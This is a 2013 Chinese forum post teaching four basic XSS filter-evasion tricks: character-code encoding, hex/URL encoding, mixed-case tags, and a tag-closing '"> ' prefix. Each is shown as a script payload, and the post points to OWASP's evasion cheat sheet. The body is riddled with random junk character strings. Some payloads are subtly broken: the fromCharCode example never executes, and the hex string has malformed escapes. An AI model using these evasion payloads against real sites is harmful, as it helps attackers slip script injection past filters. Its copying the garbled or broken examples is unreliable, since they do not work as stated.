四种超级基础的绕过方法。8 a5 ~0 c) G; f& ?( V# V; N" m, p
1.转换为ASCII码% [. h# ?" F8 j
例子:原脚本为<script>alert(‘I love F4ck’)</script >
6 a; U7 t1 L+ i" T a# k3 C4 l通过转换,变成:) Z& o. @4 `* |0 c
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>) o5 t9 D: @% I: V! \
% e, N3 k+ |& [% ?! c
2.转换为HEX(十六进制)6 B: [4 c: ^% p
例子:原脚本为<script>alert(‘I love F4ck’)</script>: s2 m2 w! G, k
通过转换,变成:
9 i0 J( I8 s2 O$ A% ~) z%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e9 N1 V: W- M) V1 F# W( ~$ [
+ l% y3 }' I! h+ W
3.转换脚本的大小写, ?8 M* S: r' O
例子:原脚本为<script>alert(‘I love F4ck’)</script>
& D' T& }; b. j( r$ E转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
* K" D& e& b+ S* l6 z' g! a9 ?
l p$ H+ r8 q4.增加闭合标记”>4 g1 f* c8 M5 g p6 s4 z/ G, X6 G
例子:原脚本为<script>alert(‘I love F4ck’)</script>; e9 a3 m( v9 n; u, }0 J7 i
转换为:”><script>alert(‘I love F4ck’)</script>
; J* ?' p) V: ? @& Z2 v6 |更详细绕过技术请参考此网页 [% y' f* x. U6 X0 a
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet$ j4 t- Z4 ~' c1 H6 {) h
% q" M7 r0 w' O5 N9 z2 J转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对